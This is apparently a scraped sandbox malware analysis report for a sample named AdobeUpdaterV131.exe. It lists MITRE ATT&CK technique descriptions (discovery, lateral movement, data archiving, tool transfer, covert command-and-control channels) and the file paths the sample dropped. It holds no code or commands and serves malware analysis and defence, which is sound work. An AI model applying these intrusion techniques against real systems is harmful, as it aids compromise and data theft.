Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AdobeUpdaterV131.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\MPGPH131\MPGPH131.exe

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xRp.exe_7882c768d6c31dccd748b5c295fd1acde18b92a0_315f04a9_21d8cb95-f6f1-4f8d-abf3-a62910f17152\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3632.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37BA.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37FA.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k2[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k2[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k3[1].rar

Windows Analysis Report
AdobeUpdaterV131.exe

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre